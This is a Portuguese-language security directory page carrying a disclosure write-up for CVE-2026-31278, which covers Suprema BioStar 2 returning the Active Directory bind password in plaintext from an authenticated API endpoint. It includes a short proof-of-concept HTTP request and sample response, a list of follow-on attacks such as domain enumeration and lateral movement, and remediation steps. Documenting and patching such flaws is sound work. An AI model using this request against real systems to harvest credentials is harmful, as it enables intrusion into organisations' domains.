Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-31278 — Write-up de CVE para vulnerabilidade de exposição de credenciais do Active Directory no Suprema BioStar 2 | Kitploit
Ferramentas/GitHubGitHub/mda1r/cve-2026-31278
Scanners de VulnerabilidadesAtaques de SenhaExploraçãoSegurança WebSegurança de RedePapers e Pesquisa
GitHubmda1r/cve-2026-31278

CVE-2026-31278

Write-up de CVE para vulnerabilidade de exposição de credenciais do Active Directory no Suprema BioStar 2

Ver Repositório
65há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-31278 Suprema BioStar 2: Exposição de Credenciais do Active Directory


Metadados

CampoDetalhes
ID do CVECVE-2026-31278
FornecedorSuprema Inc.
ProdutoBioStar 2
Tipo de VulnerabilidadeDivulgação de Informações Sensíveis / Exposição de Credenciais
Vetor de AtaqueRemoto / Autenticado / Baixa Complexidade
SeveridadeAlta
Corrigido EmBioStar 2 v2.9.12 / BioStarX v1.0.2
PesquisadorAbdullah Alannaz

Resumo

Existe uma vulnerabilidade de divulgação de informações sensíveis no Suprema BioStar 2 devido ao tratamento inadequado das configurações de integração com o Active Directory. O endpoint da API de backend /api/v2/setting/adserversetting retorna as credenciais da conta de bind do Active Directory em texto puro, apesar de a senha ser mascarada na interface administrativa.


Versões Afetadas

  • BioStar 2 Core / AC v2.9.5.29
  • BioStar 2 T&A v2.9.5.3

Detalhes Técnicos

Embora o campo de senha seja mascarado na interface administrativa, requisições autenticadas à API de backend divulgam a senha completa não criptografada, juntamente com os parâmetros de configuração do LDAP, incluindo a comunicação SSL desabilitada.

Um atacante autenticado envia uma requisição HTTP GET ao endpoint de configuração do servidor AD e recebe a senha da conta de serviço do Active Directory em texto puro na resposta do servidor.

Prova de Conceito

Requisição:

GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>

Resposta:

{
  "ad_server": "ldap://internal.domain.local",
  "bind_dn": "CN=svc_biostar,DC=domain,DC=local",
  "password": "<plaintext_password_returned_here>",
  "ssl_enabled": false
}

Impacto

Um atacante autenticado pode aproveitar as credenciais divulgadas para:

  • Realizar autenticação LDAP contra o Active Directory
  • Enumerar usuários, grupos e unidades organizacionais do domínio
  • Conduzir reconhecimento interno da rede
  • Realizar movimento lateral em sistemas conectados ao domínio
  • Potencialmente elevar privilégios dependendo das permissões da conta de serviço

Cronograma

CVE-2026-31278 atribuído pela MITRE | Correção lançada no BioStar 2 v2.9.12 / BioStarX v1.0.2 |


Remediação

  • Atualize para o BioStar 2 v2.9.12 ou BioStarX v1.0.2
  • Rotacione imediatamente todas as credenciais da conta de serviço do Active Directory
  • Restrinja o acesso à API apenas a segmentos de rede confiáveis
  • Habilite LDAPS (SSL) para a comunicação com o Active Directory

Referências

  • Suprema Inc.: https://www.supremainc.com

Crédito

Abdullah Alannaz Pesquisador de Segurança

Esta vulnerabilidade foi divulgada de forma responsável à Suprema. O fornecedor confirmou o problema e coordenou com a MITRE a atribuição do CVE.

Baixar ferramenta